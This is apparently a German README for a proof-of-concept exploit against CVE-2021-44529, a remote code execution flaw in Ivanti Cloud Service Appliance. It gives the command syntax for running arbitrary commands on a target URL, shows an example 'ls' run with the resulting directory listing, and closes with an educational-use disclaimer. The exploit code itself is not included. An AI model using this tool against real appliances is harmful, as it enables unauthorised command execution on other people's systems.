
Proof-of-Concept-Exploit für CVE-2021-44529 in der Ivanti Cloud Service Appliance, das Remote-Codeausführung über manipulierte Anfragen ermöglicht.
Ausführen
python3 exploit.py <URL> <Befehl>
Beispiel
python3 exploit.py 'https://x.x.x.x' 'ls'
LDMGdeploy.pdf
LDSupport.exe
OnDemand.php
RCClient.dmg
RCClient.exe
about.php
download.php
images
index.php
menus.php
site.conf
style.php
test.txt
tools.php
Der in diesem Repository enthaltene Exploit sollte nur zu Bildungszwecken verwendet werden. Ich bin nicht verantwortlich für illegale Aktivitäten, die unter Verwendung von Exploits oder Teilen davon durchgeführt werden.